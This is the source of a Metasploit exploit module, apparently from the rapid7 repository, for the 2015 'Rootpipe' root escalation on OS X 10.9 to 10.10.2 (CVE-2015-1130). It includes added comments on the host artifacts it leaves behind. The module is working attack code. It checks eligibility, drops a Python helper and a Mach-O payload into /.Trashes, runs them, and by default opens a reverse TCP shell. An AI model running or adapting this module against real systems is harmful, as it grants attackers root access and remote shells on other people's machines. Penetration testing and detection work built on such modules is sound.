rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/rootpipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module for CVE-2015-1130 ("Rootpipe") on OS X.
#
# Flow, as implemented below: require a non-root session whose user is in the
# 'admin' group on a product version within 10.9..10.10.2, write a Python
# helper and a Mach-O payload into WritableDir, run the helper through the
# configured interpreter, then run the payload file directly.
#
# Host artifacts a responder can look for (all visible in this file):
#   * two files with random 8-letter alphabetic names under WritableDir
#     (default "/.Trashes");
#   * the PYTHON interpreter (default "/usr/bin/python") launched with those
#     paths as arguments;
#   * direct execution of the second file once the helper has returned.
# Both files are registered for cleanup, so their absence after the session
# ends is not evidence that nothing ran.
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Declares module metadata and the two user-settable options.
  #
  # @param info [Hash] metadata supplied by the framework; merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apple OS X Rootpipe Privilege Escalation',
        'Description' => %q{
          This module exploits a hidden backdoor API in Apple's Admin framework on
          Mac OS X to escalate privileges to root, dubbed "Rootpipe."

          This module was tested on Yosemite 10.10.2 and should work on previous versions.

          The patch for this issue was not backported to older releases.

          Note: you must run this exploit as an admin user to escalate to root.
        },
        'Author' => [
          'Emil Kvarnhammar', # Vulnerability discovery and PoC
          'joev', # Copy/paste monkey
          'wvu' # Meta copy/paste monkey
        ],
        'References' => [
          ['CVE', '2015-1130'],
          ['OSVDB', '114114'],
          ['EDB', '36692'],
          ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
        ],
        'DisclosureDate' => '2015-04-09',
        'License' => MSF_LICENSE,
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'SessionTypes' => ['shell'],
        'Privileged' => true,
        # The target label mirrors the version window enforced by #ver?.
        'Targets' => [
          ['Mac OS X 10.9-10.10.2', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
          # Presumably makes the payload reset its uid before running -- confirm
          # against the payload option documentation.
          'PrependSetreuid' => true
        },
        # NOTE(review): #exploit writes two files to disk, so the side effects
        # are not really unknown (ARTIFACTS_ON_DISK would describe them).
        # Stability and reliability cannot be judged from this file alone.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])
      ]
    )
    register_advanced_options(
      [
        OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
      ]
    )
  end

  # Directory on the target that receives both dropped files.
  #
  # @return [String] the WritableDir option, coerced to a string
  def base_dir
    configured_dir = datastore['WritableDir']
    configured_dir.to_s
  end

  # Reports whether the target looks exploitable: the version must be inside
  # the supported window and the session user must be in the admin group.
  # Nothing is written to the target here.
  #
  # @return [CheckCode] Appears when both conditions hold, Safe otherwise
  def check
    return CheckCode::Safe unless ver? && is_admin?

    CheckCode::Appears
  end

  # Runs the preconditions, stages the two files, and executes them.
  # Each failed precondition aborts through fail_with.
  def exploit
    fail_with Failure::BadConfig, 'Session already has root privileges' if is_root?

    fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing." unless is_admin?

    # check repeats the admin test and adds the version window.
    fail_with Failure::NotVulnerable, 'Target is not vulnerable' unless check == CheckCode::Appears

    fail_with Failure::BadConfig, "#{base_dir} is not writable" unless writable?(base_dir)

    helper_path = exploit_file
    print_status("Writing exploit to `#{helper_path}'")
    write_file(helper_path, python_exploit)
    register_file_for_cleanup(helper_path)

    dropped_payload = payload_file
    print_status("Writing payload to `#{dropped_payload}'")
    write_file(dropped_payload, binary_payload)
    register_file_for_cleanup(dropped_payload)

    print_status('Executing exploit...')
    helper_command = sploit
    cmd_exec(helper_command)

    # The payload file is run only after the helper has been invoked; what the
    # helper changes about that file is defined in exploit.py, not shown here.
    print_status('Executing payload...')
    cmd_exec(dropped_payload)
  end

  # Version gate: true when the reported ProductVersion lies in the inclusive
  # range 10.9..10.10.2.
  #
  # @return [Boolean]
  def ver?
    detected = Rex::Version.new(get_sysinfo['ProductVersion'])
    detected.between?(Rex::Version.new('10.9'), Rex::Version.new('10.10.2'))
  end

  # Command line that launches the Python helper on the target.
  #
  # The payload path is passed twice; exploit.py is not part of this file, so
  # the meaning of the two arguments is presumably source and destination --
  # confirm against the script. None of the values are shell-quoted, so a
  # PYTHON or WritableDir value containing spaces or shell metacharacters
  # changes how the remote shell parses the line.
  #
  # @return [String]
  def sploit
    [datastore['PYTHON'], exploit_file, payload_file, payload_file].join(' ')
  end

  # Reads the Python helper from the framework's local data directory.
  #
  # @return [String] contents of data/exploits/CVE-2015-1130/exploit.py
  def python_exploit
    script_path = File.join(
      Msf::Config.data_directory, 'exploits', 'CVE-2015-1130', 'exploit.py'
    )
    File.read(script_path)
  end

  # Wraps the encoded payload in an x64 Mach-O executable.
  #
  # @return [String] the executable image
  def binary_payload
    encoded_payload = payload.encoded
    Msf::Util::EXE.to_osx_x64_macho(framework, encoded_payload)
  end

  # Remote path of the Python helper; generated once, then reused so that the
  # write, cleanup registration and execution all refer to the same file.
  #
  # @return [String]
  def exploit_file
    return @exploit_file if @exploit_file

    @exploit_file = [base_dir, Rex::Text.rand_text_alpha(8)].join('/')
  end

  # Remote path of the Mach-O payload; generated once, then reused.
  #
  # @return [String]
  def payload_file
    return @payload_file if @payload_file

    @payload_file = [base_dir, Rex::Text.rand_text_alpha(8)].join('/')
  end
end